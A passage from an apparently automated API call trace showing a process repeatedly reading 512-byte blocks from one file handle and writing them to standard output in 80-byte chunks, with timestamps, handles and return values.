(_FileHandle=1) returned 0x4c [0216.620] GetFileType (hFile=0x4c) returned 0x1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.621] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.621] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] GetFileType (hFile=0x4c) returned 0x1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] GetFileType (hFile=0x4c) returned 0x1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.622] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.622] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] GetFileType (hFile=0x4c) returned 0x1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] GetFileType (hFile=0x4c) returned 0x1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] GetFileType (hFile=0x4c) returned 0x1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] GetFileType (hFile=0x4c) returned 0x1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] GetFileType (hFile=0x4c) returned 0x1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] GetFileType (hFile=0x4c) returned 0x1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] GetFileType (hFile=0x4c) returned 0x1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] GetFileType (hFile=0x4c) returned 0x1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.623] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.623] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] GetFileType (hFile=0x4c) returned 0x1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] GetFileType (hFile=0x4c) returned 0x1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] GetFileType (hFile=0x4c) returned 0x1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] GetFileType (hFile=0x4c) returned 0x1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] GetFileType (hFile=0x4c) returned 0x1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] GetFileType (hFile=0x4c) returned 0x1 [0216.623] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.623] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] GetFileType (hFile=0x4c) returned 0x1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] GetFileType (hFile=0x4c) returned 0x1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.624] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.624] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] GetFileType (hFile=0x4c) returned 0x1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] GetFileType (hFile=0x4c) returned 0x1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] GetFileType (hFile=0x4c) returned 0x1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] GetFileType (hFile=0x4c) returned 0x1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] GetFileType (hFile=0x4c) returned 0x1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] GetFileType (hFile=0x4c) returned 0x1 [0216.624] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.624] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] GetFileType (hFile=0x4c) returned 0x1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] GetFileType (hFile=0x4c) returned 0x1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.625] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.625] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] GetFileType (hFile=0x4c) returned 0x1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] GetFileType (hFile=0x4c) returned 0x1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] GetFileType (hFile=0x4c) returned 0x1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] GetFileType (hFile=0x4c) returned 0x1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] GetFileType (hFile=0x4c) returned 0x1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] GetFileType (hFile=0x4c) returned 0x1 [0216.625] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.625] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] GetFileType (hFile=0x4c) returned 0x1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] GetFileType (hFile=0x4c) returned 0x1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.626] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.626] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] GetFileType (hFile=0x4c) returned 0x1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] GetFileType (hFile=0x4c) returned 0x1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] GetFileType (hFile=0x4c) returned 0x1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] GetFileType (hFile=0x4c) returned 0x1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] GetFileType (hFile=0x4c) returned 0x1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] GetFileType (hFile=0x4c) returned 0x1 [0216.626] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.626] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] GetFileType (hFile=0x4c) returned 0x1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] GetFileType (hFile=0x4c) returned 0x1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.627] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] GetFileType (hFile=0x4c) returned 0x1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] GetFileType (hFile=0x4c) returned 0x1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] GetFileType (hFile=0x4c) returned 0x1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] GetFileType (hFile=0x4c) returned 0x1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] GetFileType (hFile=0x4c) returned 0x1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.627] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.627] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] GetFileType (hFile=0x4c) returned 0x1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] GetFileType (hFile=0x4c) returned 0x1 [0216.628] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.628] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, 